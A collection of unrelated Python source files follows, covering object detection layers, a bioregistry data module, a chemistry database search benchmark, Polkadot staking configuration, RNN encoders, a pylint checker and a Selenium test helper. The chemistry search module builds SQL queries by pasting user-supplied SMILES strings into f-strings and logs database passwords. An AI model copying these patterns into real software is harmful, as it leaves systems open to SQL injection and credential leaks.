box_to_level)[0]).indices[::-1]
ix = tf.gather(box_to_level[:, 2], ix)
pooled = tf.gather(pooled, ix)
# Re-add the batch dimension
pooled = tf.expand_dims(pooled, 0)
return pooled
def compute_output_shape(self, input_shape):
return None, self.num_rois, self.channel_num
############################################################
# Detection Layer
############################################################
def clip_to_window(window, boxes):
"""
window: (y1, x1, y2, x2). The window in the image we want to clip to.
boxes: [N, (y1, x1, y2, x2)]
"""
boxes[:, 0] = np.maximum(np.minimum(boxes[:, 0], window[2]), window[0])
boxes[:, 1] = np.maximum(np.minimum(boxes[:, 1], window[3]), window[1])
boxes[:, 2] = np.maximum(np.minimum(boxes[:, 2], window[2]), window[0])
boxes[:, 3] = np.maximum(np.minimum(boxes[:, 3], window[3]), window[1])
return boxes
def refine_detections_graph(rois, probs, deltas, window, config):
"""Refine classified proposals and filter overlaps and return final
detections.
Inputs:
rois: [N, (y1, x1, y2, x2)] in normalized coordinates
probs: [N, num_classes]. Class probabilities.
deltas: [N, (dy, dx, log(dh), log(dw))]. Class-specific
bounding box deltas.
window: (y1, x1, y2, x2) in image coordinates. The part of the image
that contains the image excluding the padding.
Returns detections shaped: [N, (y1, x1, y2, x2, class_id, score)] where
coordinates are in image domain.
"""
# Class IDs per ROI
class_ids = tf.argmax(probs, axis=1, output_type=tf.int32)
# Class probability of the top class of each ROI
indices = tf.stack([tf.range(probs.shape[0]), class_ids], axis=1)
class_scores = tf.gather_nd(probs, indices)
# Class-specific bounding box deltas
# deltas_specific = tf.gather_nd(deltas, indices)
# Apply bounding box deltas
# Shape: [boxes, (y1, x1, y2, x2)] in normalized coordinates
refined_rois = apply_box_deltas_graph(
rois, deltas * config.BBOX_STD_DEV)
# Convert coordiates to image domain
# TODO: better to keep them normalized until later
height, width = config.IMAGE_SHAPE[:2]
refined_rois *= tf.constant([height, width, height, width], dtype=tf.float32)
# Clip boxes to image window
refined_rois = clip_boxes_graph(refined_rois, window)
# Round and cast to int since we're deadling with pixels now
refined_rois = tf.to_int32(tf.rint(refined_rois))
# TODO: Filter out boxes with zero area
# Filter out background boxes
keep = tf.where(class_ids > 0)[:, 0]
# Filter out low confidence boxes
if config.DETECTION_MIN_CONFIDENCE:
conf_keep = tf.where(class_scores >= config.DETECTION_MIN_CONFIDENCE)[:, 0]
keep = tf.sets.set_intersection(tf.expand_dims(keep, 0),
tf.expand_dims(conf_keep, 0))
keep = tf.sparse_tensor_to_dense(keep)[0]
# Apply per-class NMS
# 1. Prepare variables
pre_nms_class_ids = tf.gather(class_ids, keep)
pre_nms_scores = tf.gather(class_scores, keep)
pre_nms_rois = tf.gather(refined_rois, keep)
unique_pre_nms_class_ids = tf.unique(pre_nms_class_ids)[0]
def nms_keep_map(class_id):
"""Apply Non-Maximum Suppression on ROIs of the given class."""
# Indices of ROIs of the given class
ixs = tf.where(tf.equal(pre_nms_class_ids, class_id))[:, 0]
# Apply NMS
class_keep = tf.image.non_max_suppression(
tf.to_float(tf.gather(pre_nms_rois, ixs)),
tf.gather(pre_nms_scores, ixs),
max_output_size=config.DETECTION_MAX_INSTANCES,
iou_threshold=config.DETECTION_NMS_THRESHOLD)
# Map indicies
class_keep = tf.gather(keep, tf.gather(ixs, class_keep))
# Pad with -1 so returned tensors have the same shape
gap = config.DETECTION_MAX_INSTANCES - tf.shape(class_keep)[0]
class_keep = tf.pad(class_keep, [(0, gap)],
mode='CONSTANT', constant_values=-1)
# Set shape so map_fn() can infer result shape
class_keep.set_shape([config.DETECTION_MAX_INSTANCES])
return class_keep
# 2. Map over class IDs
nms_keep = tf.map_fn(nms_keep_map, unique_pre_nms_class_ids,
dtype=tf.int64)
# 3. Merge results into one list, and remove -1 padding
nms_keep = tf.reshape(nms_keep, [-1])
nms_keep = tf.gather(nms_keep, tf.where(nms_keep > -1)[:, 0])
# 4. Compute intersection between keep and nms_keep
keep = tf.sets.set_intersection(tf.expand_dims(keep, 0),
tf.expand_dims(nms_keep, 0))
keep = tf.sparse_tensor_to_dense(keep)[0]
# Keep top detections
roi_count = config.DETECTION_MAX_INSTANCES
class_scores_keep = tf.gather(class_scores, keep)
num_keep = tf.minimum(tf.shape(class_scores_keep)[0], roi_count)
top_ids = tf.nn.top_k(class_scores_keep, k=num_keep, sorted=True)[1]
keep = tf.gather(keep, top_ids)
# Arrange output as [N, (y1, x1, y2, x2, class_id, score)]
# Coordinates are in image domain.
detections = tf.concat([
tf.to_float(tf.gather(refined_rois, keep)),
tf.to_float(tf.gather(class_ids, keep))[..., tf.newaxis],
tf.gather(class_scores, keep)[..., tf.newaxis]
], axis=1)
# Pad with zeros if detections < DETECTION_MAX_INSTANCES
gap = config.DETECTION_MAX_INSTANCES - tf.shape(detections)[0]
detections = tf.pad(detections, [(0, gap), (0, 0)], "CONSTANT")
return detections
def parse_image_meta_graph(meta):
"""Parses a tensor that contains image attributes to its components.
See compose_image_meta() for more details.
meta: [batch, meta length] where meta length depends on NUM_CLASSES
"""
image_id = meta[:, 0]
image_shape = meta[:, 1:4]
window = meta[:, 4:8]
active_class_ids = meta[:, 8:]
return [image_id, image_shape, window, active_class_ids]
class DetectionLayer(KE.Layer):
"""Takes classified proposal boxes and their bounding box deltas and
returns the final detection boxes.
Returns:
[batch, num_detections, (y1, x1, y2, x2, class_id, class_score)] where
coordinates are in image domain
"""
def __init__(self, config=None, **kwargs):
super(DetectionLayer, self).__init__(**kwargs)
self.config = config
def call(self, inputs):
rois = inputs[0]
mrcnn_class = inputs[1]
mrcnn_bbox = inputs[2]
image_meta = inputs[3]
# Run detection refinement graph on each item in the batch
_, _, window, _ = parse_image_meta_graph(image_meta)
detections_batch = KerasRFCN.Utils.batch_slice(
[rois, mrcnn_class, mrcnn_bbox, window],
lambda x, y, w, z: refine_detections_graph(x, y, w, z, self.config),
self.config.IMAGES_PER_GPU)
# Reshape output
# [batch, num_detections, (y1, x1, y2, x2, class_score)] in pixels
return tf.reshape(
detections_batch,
[self.config.BATCH_SIZE, self.config.DETECTION_MAX_INSTANCES, 6])
def compute_output_shape(self, input_shape):
return (None, self.config.DETECTION_MAX_INSTANCES, 6)
|
python
|
# -*- coding: utf-8 -*-
"""Utilities for interacting with data and the schema."""
import json
import logging
from collections import defaultdict
from functools import lru_cache
from pathlib import Path
from typing import Dict, Mapping, Set, Union
from .constants import (
BIOREGISTRY_PATH,
COLLECTIONS_PATH,
CONTEXTS_PATH,
METAREGISTRY_PATH,
MISMATCH_PATH,
)
from .schema import Attributable, Collection, Context, Registry, Resource
from .utils import extended_encoder
logger = logging.getLogger(__name__)
@lru_cache(maxsize=1)
def read_metaregistry() -> Mapping[str, Registry]:
"""Read the metaregistry."""
with open(METAREGISTRY_PATH, encoding="utf-8") as file:
data = json.load(file)
return {
registry.prefix: registry
for registry in (Registry(**record) for record in data["metaregistry"])
}
@lru_cache(maxsize=1)
def read_registry() -> Mapping[str, Resource]:
"""Read the Bioregistry as JSON."""
return _registry_from_path(BIOREGISTRY_PATH)
def _registry_from_path(path: Union[str, Path]) -> Mapping[str, Resource]:
with open(path, encoding="utf-8") as file:
data = json.load(file)
return {prefix: Resource(prefix=prefix, **value) for prefix, value in data.items()}
def add_resource(resource: Resource) -> None:
"""Add a resource to the registry.
:param resource: A resource object to write
:raises KeyError: if the prefix is already present in the registry
"""
registry = dict(read_registry())
if resource.prefix in registry:
raise KeyError("Tried to add duplicate entry to the registry")
registry[resource.prefix] = resource
# Clear the cache
read_registry.cache_clear()
write_registry(registry)
@lru_cache(maxsize=1)
def read_mismatches() -> Mapping[str, Mapping[str, str]]:
"""Read the mismatches as JSON."""
with MISMATCH_PATH.open() as file:
return json.load(file)
def is_mismatch(bioregistry_prefix, external_metaprefix, external_prefix) -> bool:
"""Return if the triple is a mismatch."""
return external_prefix in read_mismatches().get(bioregistry_prefix, {}).get(
external_metaprefix, {}
)
@lru_cache(maxsize=1)
def read_collections() -> Mapping[str, Collection]:
"""Read the manually curated collections."""
with open(COLLECTIONS_PATH, encoding="utf-8") as file:
data = json.load(file)
return {
collection.identifier: collection
for collection in (Collection(**record) for record in data["collections"])
}
def write_collections(collections: Mapping[str, Collection]) -> None:
"""Write the collections."""
values = [v for _, v in sorted(collections.items())]
for collection in values:
collection.resources = sorted(set(collection.resources))
with open(COLLECTIONS_PATH, encoding="utf-8", mode="w") as file:
json.dump(
{"collections": values},
file,
indent=2,
sort_keys=True,
ensure_ascii=False,
default=extended_encoder,
)
def write_registry(registry: Mapping[str, Resource]):
"""Write to the Bioregistry."""
with open(BIOREGISTRY_PATH, mode="w", encoding="utf-8") as file:
json.dump(
registry, file, indent=2, sort_keys=True, ensure_ascii=False, default=extended_encoder
)
def write_metaregistry(metaregistry: Mapping[str, Registry]) -> None:
"""Write to the metaregistry."""
values = [v for _, v in sorted(metaregistry.items())]
with open(METAREGISTRY_PATH, mode="w", encoding="utf-8") as file:
json.dump(
{"metaregistry": values},
fp=file,
indent=2,
sort_keys=True,
ensure_ascii=False,
default=extended_encoder,
)
def write_contexts(contexts: Mapping[str, Context]) -> None:
"""Write to contexts."""
with open(CONTEXTS_PATH, mode="w", encoding="utf-8") as file:
json.dump(
contexts,
fp=file,
indent=2,
sort_keys=True,
ensure_ascii=False,
default=extended_encoder,
)
def read_contributors() -> Mapping[str, Attributable]:
"""Get a mapping from contributor ORCID identifiers to author objects."""
rv: Dict[str, Attributable] = {}
for resource in read_registry().values():
if resource.contributor and resource.contributor.orcid:
rv[resource.contributor.orcid] = resource.contributor
for contributor in resource.contributor_extras or []:
if contributor.orcid:
rv[contributor.orcid] = contributor
if resource.reviewer and resource.reviewer.orcid:
rv[resource.reviewer.orcid] = resource.reviewer
contact = resource.get_contact()
if contact and contact.orcid:
rv[contact.orcid] = contact
for metaresource in read_metaregistry().values():
if metaresource.contact.orcid:
rv[metaresource.contact.orcid] = metaresource.contact
for collection in read_collections().values():
for author in collection.authors or []:
if author.orcid:
rv[author.orcid] = author
return rv
def read_prefix_contributions() -> Mapping[str, Set[str]]:
"""Get a mapping from contributor ORCID identifiers to prefixes."""
rv = defaultdict(set)
for prefix, resource in read_registry().items():
if resource.contributor and resource.contributor.orcid:
rv[resource.contributor.orcid].add(prefix)
for contributor in resource.contributor_extras or []:
if contributor.orcid:
rv[contributor.orcid].add(prefix)
return dict(rv)
def read_prefix_reviews() -> Mapping[str, Set[str]]:
"""Get a mapping from reviewer ORCID identifiers to prefixes."""
rv = defaultdict(set)
for prefix, resource in read_registry().items():
if resource.reviewer and resource.reviewer.orcid:
rv[resource.reviewer.orcid].add(prefix)
return dict(rv)
def read_prefix_contacts() -> Mapping[str, Set[str]]:
"""Get a mapping from contact ORCID identifiers to prefixes."""
rv = defaultdict(set)
for prefix, resource in read_registry().items():
contact_orcid = resource.get_contact_orcid()
if contact_orcid:
rv[contact_orcid].add(prefix)
return dict(rv)
def read_collections_contributions() -> Mapping[str, Set[str]]:
"""Get a mapping from contributor ORCID identifiers to collections."""
rv = defaultdict(set)
for collection_id, resource in read_collections().items():
for author in resource.authors or []:
rv[author.orcid].add(collection_id)
return dict(rv)
def read_registry_contributions() -> Mapping[str, Set[str]]:
"""Get a mapping from contributor ORCID identifiers to collections."""
rv = defaultdict(set)
for metaprefix, resource in read_metaregistry().items():
if resource.contact and resource.contact.orcid:
rv[resource.contact.orcid].add(metaprefix)
return dict(rv)
def read_context_contributions() -> Mapping[str, Set[str]]:
"""Get a mapping from contributor ORCID identifiers to contexts."""
rv = defaultdict(set)
for context_key, context in read_contexts().items():
for maintainer in context.maintainers:
rv[maintainer.orcid].add(context_key)
return dict(rv)
def read_contexts() -> Mapping[str, Context]:
"""Get a mapping from context keys to contexts."""
return {
key: Context(**data)
for key, data in json.loads(CONTEXTS_PATH.read_text(encoding="utf-8")).items()
}
|
python
|
from dataclasses import dataclass
from time import time
from typing import Union, Tuple
import psycopg2
from loguru import logger
from pony.orm import Database, Required, PrimaryKey, db_session
@dataclass()
class GetQuery:
mol_smi: str
search_type: str
fp_type: Union[bool, str] = False
sort_by_similarity: bool = False
@property
def get_fp_function_name(self) -> str:
fp_dict = {"mfp2": "morganbv_fp", "ffp2": "featmorganbv_fp", "torsionbv": "torsionbv_fp"}
try:
function_name = fp_dict[self.fp_type]
except KeyError:
return "FP doesn't exist"
return function_name
def __str__(self) -> str:
"""
Generates a query to the database.
"""
if self.search_type == "similarity":
function_name = self.get_fp_function_name
if not self.sort_by_similarity:
logger.info(
f"select * from public.fps where {self.fp_type}%{function_name}('{self.mol_smi}')"
)
return f"select * from public.fps where {self.fp_type}%{function_name}('{self.mol_smi}')"
else:
if self.fp_type == "mfp2":
return (
f"select id, tanimoto_sml({self.fp_type}, {function_name}('{self.mol_smi}')) t "
f"from public.fps where {self.fp_type}%{function_name}('{self.mol_smi}') order by t DESC"
)
if self.search_type == "substructure":
if not self.sort_by_similarity:
return f"select * from public.mols where m@>'{self.mol_smi}'"
else:
function_name = self.get_fp_function_name
count_tanimoto = (
f"tanimoto_sml({function_name}(m), {function_name}('{self.mol_smi}'))"
)
return (
f"select id, m, {count_tanimoto} t from public.mols where m@>'{self.mol_smi}' "
f"order by t DESC"
)
if self.search_type == "equal":
pass
def pony_db_map(db_name: str, user_name: str, db_port: int, db_password: str) -> Database:
"""
Creates classes for PonyORM.
"""
db = Database()
class Fps(db.Entity):
_table_ = "fps"
id = PrimaryKey(int, auto=True)
mfp2 = Required(int)
class Mols(db.Entity):
_table_ = "mols"
id = PrimaryKey(int, auto=True)
m = Required(str)
class Raw_data(db.Entity):
_table_ = "raw_data"
id = PrimaryKey(int, auto=True)
smiles = Required(str)
if db_password:
db.bind(
provider="postgres",
user=user_name,
host="localhost",
database=db_name,
port=db_port,
password=db_password,
)
else:
db.bind(
provider="postgres",
user=user_name,
host="localhost",
database=db_name,
port=db_port,
)
db.generate_mapping(create_tables=True)
return db
class SearchTimeCursor:
def __init__(self, **kwargs):
"""
Database connection.
"""
conn_params = (
f"port={kwargs['port']} "
f"dbname={kwargs['dbname']} "
f"host=localhost "
f"user={kwargs['user']}"
)
if kwargs["password"]:
conn_params = f"{conn_params} password={kwargs['password']}"
logger.info(conn_params, "connection params")
conn = psycopg2.connect(conn_params)
# loguru doesn't work in this case (AttributeError: 'psycopg2.extensions.connection' object has no attribute
# 'format')
print(conn, "connection")
self.curs = conn.cursor()
def get_time_and_count(
self,
mol_smi: str,
search_type: str,
fp_type: Union[bool, str] = False,
sort_by_similarity: bool = False,
limit: int = 1,
) -> Tuple[float, int]:
"""
Counts time for search by PostgreSQL.
Returns search time and count mols from query.
"""
logger.info("Postgresql search... ")
query = str(
GetQuery(
mol_smi=mol_smi,
search_type=search_type,
fp_type=fp_type,
sort_by_similarity=sort_by_similarity,
)
)
start_time = time()
self.curs.execute(query)
query_res = self.curs.fetchmany(size=limit)
end_time = time()
return end_time - start_time, len(query_res)
class SearchPony:
def __init__(self, database_name: str, user_name: str, db_port: int, db_password: str):
"""
Database connection.
"""
self.database_name = database_name
self.user_name = user_name
self.db = pony_db_map(self.database_name, self.user_name, db_port, db_password)
@db_session
def get_time_and_count(
self,
mol_smi: str,
search_type: str,
fp_type: Union[bool, str] = False,
sort_by_similarity: bool = False,
limit: Union[int, str] = "",
) -> Tuple[float, int]:
"""
Counts time for search by PonyORM.
Returns search time and count mols from query.
"""
logger.info("Pony search..")
postgresql_query = GetQuery(
mol_smi=mol_smi,
search_type=search_type,
fp_type=fp_type,
sort_by_similarity=sort_by_similarity,
)
logger.info(
"Query for {} search, fp type {}, sort by similatity {} postgresql: {}",
search_type,
fp_type,
sort_by_similarity,
postgresql_query,
)
start_time = time()
res = self.db.execute(str(postgresql_query))
query_res = res.fetchmany(size=limit)
end_time = time()
return end_time - start_time, len(query_res)
|
python
|
from substrateinterface import SubstrateInterface
import os
from utils import get_project_root_dir
# execution environment (for testing) --------------
main_script = os.path.join(get_project_root_dir(), "StakingManager.py")
# to get your python env, execute "which python" in CLI with env activated
# E.g. for anaconda read https://docs.anaconda.com/anaconda/user-guide/tasks/integration/python-path/
"""
Lucas:
I put my env below, just comment it out and run yours. We'll put
everything in a docker container later to resolve this issue
"""
venv_env = "/Users/lucas/opt/anaconda3/envs/crypto_hedge_fund/bin/python"
# venv_env = os.path.join(get_project_root_dir(), "venv\\Scripts\\python.exe")
# websockets ---------------------------------------
# substrate are a modular framework for building blockchains.
# Polkadot is built using Substrate. Chains built with Substrate will be easy to connect as parachains.
# dot
# https://github.com/paritytech/ss58-registry/blob/main/ss58-registry.json
def substratePolkadot():
substrate_polkadot = SubstrateInterface(
url="wss://rpc.polkadot.io",
ss58_format=0,
type_registry_preset='polkadot'
)
return substrate_polkadot
# Kusama
def substrateKusama():
substrate_kusama = SubstrateInterface(
url="wss://kusama-rpc.polkadot.io/",
ss58_format=2,
type_registry_preset='kusama'
)
return substrate_kusama
# Rococo
def substrateRococo():
substrate_rococo = SubstrateInterface(
url="wss://rococo-rpc.polkadot.io",
ss58_format=42,
type_registry_preset='rococo'
)
return substrate_rococo
# Westend
def substrateWestend():
substrate_westend = SubstrateInterface(
url="wss://westend-rpc.polkadot.io",
ss58_format=42,
type_registry_preset='westend'
)
return substrate_westend
# ---------------------------------------
# validator
westendValidator = ["5C556QTtg1bJ43GDSgeowa3Ark6aeSHGTac1b2rKSXtgmSmW"]
binanceValidator = ["114SUbKCXjmb9czpWTtS3JANSmNRwVa4mmsMrWYpRG1kDH5"]
# There is also a maximum of 22,500 nominators in place at the moment. That means,
# if there are already 22,500 nominators, you will not be able to nominate,
# even if you have more than the minimum of 120 DOT staked.
# You can double-check the current number of nominators
# on https://polkadot.js.org/apps/?rpc=wss%3A%2F%2Frpc.pinknode.io%2Fpolkadot%2Fexplorer#/staking
# TODO a function that check number of active nominator if the value > 22500 return False (no place to nominate) else True
# configs
# TODO `value` must be more than the `minimum_balance` specified by`T::Currency`. how to use substrate to fetch this information
class ProductionConfig:
activeSubstrate = substratePolkadot()
activeValidator = binanceValidator
ss58_format = 0
coinDecimalPlaces = 10 ** 10
coinDecimalPlacesLength = 10
coinName = "DOT"
# Nominating currently requires a minimum of 120 DOT staked funds on Polkadot
stakeMinimumAmount = 120
# On the Polkadot network, an address is only active when it holds a minimum amount, currently set at 1 DOT
existentialDeposit = 1
class TestingConfig:
activeSubstrate = substrateWestend()
activeValidator = westendValidator
ss58_format = 42
coinDecimalPlaces = 10 ** 12
coinDecimalPlacesLength = 12
coinName = "WND"
stakeMinimumAmount = 1
existentialDeposit = 1
activeConfig = TestingConfig
|
python
|
from aurora.amun.client.session import AmunSession
def main():
# Calling with no token in constructor will load one from an environment variable if provided
# or a file in HOME/.
session = AmunSession()
print("Getting Valuations")
valuations = session.get_valuations()
numToShow = 5
print(f"found {len(valuations)} valuations print first {numToShow}")
for val in valuations[:numToShow]:
print(val)
# filters valuations through the name, description and author
# (includes MySQL avanced search query functionalities)
filtered_valuations = session.get_valuations(searchText="test")
print(f"found {len(filtered_valuations)} with the custom search text.")
for val in filtered_valuations:
print(val)
print("Done")
if __name__ == "__main__":
main()
|
python
|
import torch
import torch.nn as nn
from torch.nn.utils.rnn import pack_padded_sequence
from torch import Tensor
from models.convolutional_rnn import Conv2dLSTM
class RNNEncoder(nn.Module):
def __init__(self, num_layers: int = 2, hidden_size: int = 512, action__chn: int = 64, speed_chn: int = 64):
super(RNNEncoder, self).__init__()
self.hidden_size = hidden_size
self.lstm = Conv2dLSTM(
in_channels=512 + action__chn + speed_chn, # Corresponds to input size
out_channels=hidden_size, # Corresponds to hidden size
kernel_size=3, # Int or List[int]
num_layers=num_layers,
bidirectional=True,
stride=2, # dropout=0.5, dilation=2,
batch_first=True)
self.action_cod = nn.Sequential(
nn.Linear(3, 8),
nn.ReLU(),
nn.Linear(8, 16)
)
self.action_conv = nn.Conv2d(
1, action__chn, kernel_size=(1, 1)
)
self.speed_cod = nn.Sequential(
nn.Linear(1, 8),
nn.ReLU(),
nn.Linear(8, 16)
)
self.speed_conv = nn.Conv2d(
1, speed_chn, kernel_size=(1, 1)
)
self.output_conv = nn.Conv2d(
hidden_size * 2 * 4, 512, kernel_size=(1, 1)
)
def forward(self, embedding, action, speed, embedding_length):
"""
Output dim: BxHiddenSize
"""
# Action (B, 3) => (B, 16) => (B, 1, 4, 4)
action_cod = self.action_cod(action).view(-1, 1, 4, 4)
# Action (B, 1, 4, 4) => (B, 64, 4, 4) => (B, 1, 64, 4, 4)
action_cod = self.action_conv(action_cod).unsqueeze(dim=1)
# Action (B, 1, 64, 4, 4) => (B, 4, 64, 4, 4)
action_cod = torch.cat((action_cod, action_cod, action_cod, action_cod), dim=1)
# Speed (B, 1) => (B, 16) => (B, 1, 4, 4)
speed_cod = self.speed_cod(speed).view(-1, 1, 4, 4)
# Speed (B, 1, 4, 4) => (B, 64, 4, 4) => (B, 1, 64, 4, 4)
speed_cod = self.speed_conv(speed_cod).unsqueeze(dim=1)
# Speed (B, 1, 64, 4, 4) => (B, 4, 64, 4, 4)
speed_cod = torch.cat((speed_cod, speed_cod, speed_cod, speed_cod), dim=1)
# Cat embeddings and action (B, 4, 512, 4, 4) + (B, 4, 1, 4, 4) => (B, 4, 513, 4, 4)
action_emb = torch.cat((embedding, action_cod, speed_cod), dim=2)
x_pack = pack_padded_sequence(action_emb, embedding_length, batch_first=True)
# x_pack = pack_padded_sequence(action_emb, torch.ones((32)), batch_first=True)
h = None
y, h = self.lstm(x_pack, h)
# Output of lstm is stacked through all outputs (#outputs == #inputs), we get last output
y = self.output_conv(y.data.view(embedding.shape[0], -1, embedding.shape[-2], embedding.shape[-1]))
# y = y.data.view(embedding.shape)[:, -1, :, :, :].squeeze(dim=1)
# y = torch.mean(y.data.view(embedding.shape), dim=1)
return y, h
class VanillaRNNEncoder(nn.Module):
def __init__(self, num_layers: int = 2, hidden_size: int = 512, action__chn: int = 64, speed_chn: int = 64,
dropout: float = 0, bidirectional: bool = False):
super(VanillaRNNEncoder, self).__init__()
self.hidden_size = hidden_size
self.lstm = nn.LSTM(
input_size=8192 + action__chn + speed_chn,
hidden_size=hidden_size,
num_layers=num_layers,
bidirectional=bidirectional,
dropout=dropout,
batch_first=True
)
self.action_cod = nn.Sequential(
nn.Linear(3, 16),
nn.ReLU(),
nn.Linear(16, action__chn)
)
self.speed_cod = nn.Sequential(
nn.Linear(3, 16),
nn.ReLU(),
nn.Linear(16, speed_chn)
)
input_fc_size = 4 * (2 if bidirectional else 1) * hidden_size # times 4 because every sequence has length 4
self.output_fc = nn.Linear(input_fc_size, 512*4*4)
def forward(self, embedding, action, speed):
"""
Output dim: BxHiddenSize
"""
# Action (B, 3) => (B, action_chn) => (B, 1, action_chn)
action_cod = self.action_cod(action).unsqueeze(dim=1)
# Action (B, 1, action_chn) => (B, 4, action_chn)
action_cod = torch.cat((action_cod, action_cod, action_cod, action_cod), dim=1)
# Speed (B, 3) => (B, 1, speed_chn)
speed_cod = self.speed_cod(speed).unsqueeze(dim=1)
# Speed (B, 1, speed_chn) => (B, 4, speed_chn)
speed_cod = torch.cat((speed_cod, speed_cod, speed_cod, speed_cod), dim=1)
# (B, T, 512, 4, 4) => (B, T, 8192)
vis_embedding = embedding.view(embedding.shape[0], embedding.shape[1], -1)
# Cat embeddings and action (B, 4, 8192) + (B, 4, speed_chn) + (B, 4, action_chn) =>
# (B, 4, 8192 + speed_chn + action_chn)
action_emb = torch.cat((vis_embedding, action_cod, speed_cod), dim=2)
y, h = self.lstm(action_emb)
# (B, 4, (2 if bidirectional else 1)*hidden_size)
y = self.output_fc(y.reshape(embedding.shape[0], -1))
# y (B, 512, 4, 4)
return y.view(-1, embedding.shape[-3], embedding.shape[-2], embedding.shape[-1]), h
def freeze(self):
for param in self.parameters():
param.requires_grad = False
class SequenceRNNEncoder(nn.Module):
def __init__(self, num_layers: int = 2, hidden_size: int = 512, action__chn: int = 64, speed_chn: int = 64,
dropout: float = 0, bidirectional: bool = False):
super(SequenceRNNEncoder, self).__init__()
self.hidden_size = hidden_size
self.num_layers = num_layers
self.bidirectinal = (2 if bidirectional else 1)
self.lstm = nn.LSTM(
input_size=8192 + action__chn + speed_chn,
hidden_size=hidden_size,
num_layers=num_layers,
bidirectional=bidirectional,
dropout=dropout,
batch_first=True
)
self.action_cod = nn.Sequential(
nn.Linear(3, 64),
nn.ReLU(),
nn.Linear(64, action__chn)
)
self.speed_cod = nn.Sequential(
nn.Linear(3, 64),
nn.ReLU(),
nn.Linear(64, speed_chn)
)
input_fc_size = (2 if bidirectional else 1) * hidden_size # times 4 because every sequence has length 4
self.output_fc = nn.Linear(input_fc_size, 512*4*4)
def forward(self, embedding, action, speed, hidden=None):
"""
Output dim: BxHiddenSize
"""
# Action (B, 3) => (B, action_chn) => (B, 1, action_chn)
action_cod = self.action_cod(action).unsqueeze(dim=1)
# Action (B, 1, action_chn) => (B, 4, action_chn)
action_cod = torch.cat((action_cod, action_cod, action_cod, action_cod), dim=1)
# Speed (B, 3) => (B, 1, speed_chn)
speed_cod = self.speed_cod(speed).unsqueeze(dim=1)
# Speed (B, 1, speed_chn) => (B, 4, speed_chn)
speed_cod = torch.cat((speed_cod, speed_cod, speed_cod, speed_cod), dim=1)
# (B, T, 512, 4, 4) => (B, T, 8192)
vis_embedding = embedding.view(embedding.shape[0], embedding.shape[1], -1)
# Cat embeddings and action (B, 4, 8192) + (B, 4, speed_chn) + (B, 4, action_chn) =>
# (B, 4, 8192 + speed_chn + action_chn)
action_emb = torch.cat((vis_embedding, action_cod, speed_cod), dim=2)
y, h = self.lstm(action_emb, hidden)
# y shape (B, 4, hidden_size*bidirectional) => (4*B, hidden_size*bidirectional) => (4*B, 512*4*4)
y = self.output_fc(y.reshape(y.shape[0]*y.shape[1], -1))
return y.view(embedding.shape), h
def encode(self, embedding, action, speed, hidden=None):
# Action (B, 3) => (B, action_chn) => (B, 1, action_chn)
action_cod = self.action_cod(action).unsqueeze(dim=1)
# Speed (B, 3) => (B, 1, speed_chn)
speed_cod = self.speed_cod(speed).unsqueeze(dim=1)
# (B, T, 512, 4, 4) => (B, T, 8192)
vis_embedding = embedding.view(embedding.shape[0], embedding.shape[1], -1)
# Cat embeddings and action (B, 4, 8192) + (B, 4, speed_chn) + (B, 4, action_chn) =>
# (B, 4, 8192 + speed_chn + action_chn)
action_emb = torch.cat((vis_embedding, action_cod, speed_cod), dim=2)
y, h = self.lstm(action_emb, hidden)
return y, h
def init_hidden(self, batch_size, device='cpu'):
h_shape = (self.bidirectinal*self.num_layers, batch_size, self.hidden_size)
h0 = torch.zeros(h_shape, requires_grad=False).to(device)
h1 = torch.zeros(h_shape, requires_grad=False).to(device)
return h0, h1
def freeze(self):
for param in self.parameters():
param.requires_grad = False
|
python
|
# from .helpers.utils_ import *
# from .helpers.math_ import MathClass
# from .helpers.mm import MatrixMadness
from .main import *
|
python
|
from __future__ import print_function
from __future__ import absolute_import
import astroid
from pylint.interfaces import IAstroidChecker
from pylint.checkers import BaseChecker
from pylint.checkers.utils import check_messages
MSGS = {
'E1113': ('Import inside a function from shining is not allowed',
'infunction-import',
'Import inside a function from shining is not allowed'),
'E1114': ('Imports from catkin are not allowed',
'catkin-import',
'Imports from catkin are not allowed'),
'E1115': ('Imports from src/calibration are not allowed',
'calibration-import',
'Imports from src/calibration are not allowed'),
'E1116': ('Imports from tests are not allowed',
'test-import',
'Imports from tests are not allowed'),
'E1117': ('Imports from sandboxes are not allowed',
'sandbox-import',
'Imports from sandboxes are not allowed'),
}
class CheckIllegalImports(BaseChecker):
"""
Check for
- imports inside functions
- imports from catkin
- imports from calibration scripts folder
"""
__implements__ = IAstroidChecker
name = 'shining_illegal_imports'
msgs = MSGS
priority = -2
options = ()
@check_messages(*list(MSGS.keys()))
def visit_import(self, node):
"""triggered when an import statement is seen"""
self._check_node(node.names[0][0], node)
@check_messages(*list(MSGS.keys()))
def visit_importfrom(self, node):
"""triggered when a from statement is seen"""
self._check_node(node.modname, node)
def _check_node(self, name, node):
if name.startswith('catkin_ws'):
self.add_message('catkin-import', node=node)
return
if name.startswith('calibration'):
self.add_message('calibration-import', node=node)
return
if not name.startswith('shining_software'):
return
module_name = name.split('.')[-1]
if module_name.startswith('test_'):
self.add_message('test-import', node=node)
if 'sandbox' in module_name:
self.add_message('sandbox-import', node=node)
if _is_in_function_import(node):
self.add_message('infunction-import', node=node)
def _is_in_function_import(node):
'''
Determines that import is a module-level import
:param node: astroid node
:return: True if an import is inside a function
'''
parent = node.parent
allowed_node_types = (astroid.TryExcept, astroid.TryFinally, astroid.If)
while not isinstance(parent, astroid.Module):
if not isinstance(parent, allowed_node_types):
return True
parent = parent.parent
return False
def register(linter):
"""required method to auto register this checker """
linter.register_checker(CheckIllegalImports(linter))
|
python
|
from selenium import webdriver
class Application:
def __init__(self):
self.wd = webdriver.Chrome(executable_path="C:\\chromedriver_win32\\chromedriver.exe")
self.wd.implicitly_wait(60)
def open_home_page(self):
wd = self.wd
wd.get("http://localhost/addressbook/addressbook/group.php")
def login(self, username, password):
wd = self.wd
self.open_home_page()
wd.find_element_by_name("user").click()
wd.find_element_by_name("user").clear()
wd.find_element_by_name("user").send_keys(username)
wd.find_element_by_name("pass").click()
wd.find_element_by_name("pass").clear()
wd.find_element_by_name("pass").send_keys(password)
wd.find_element_by_xpath("//form[@id='LoginForm']/input[3]").click()
def open_groups_page(self):
wd = self.wd
wd.find_element_by_link_text("grupy").click()
def create_group(self, group):
wd = self.wd
self.open_groups_page()
# init group creation
wd.find_element_by_name("new").click()
wd.find_element_by_name("group_name").click()
wd.find_element_by_name("group_name").clear()
wd.find_element_by_name("group_name").send_keys("grupa lesson1")
if not wd.find_element_by_xpath("//div[@id='content']/form/select//option[1]").is_selected():
wd.find_element_by_xpath("//div[@id='content']/form/select//option[1]").click()
